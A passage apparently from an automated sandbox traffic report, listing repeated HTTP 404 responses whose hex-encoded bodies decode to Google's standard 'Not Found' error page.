3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:13:57 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:13:59 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:01 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:03 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:05 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:14:07 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 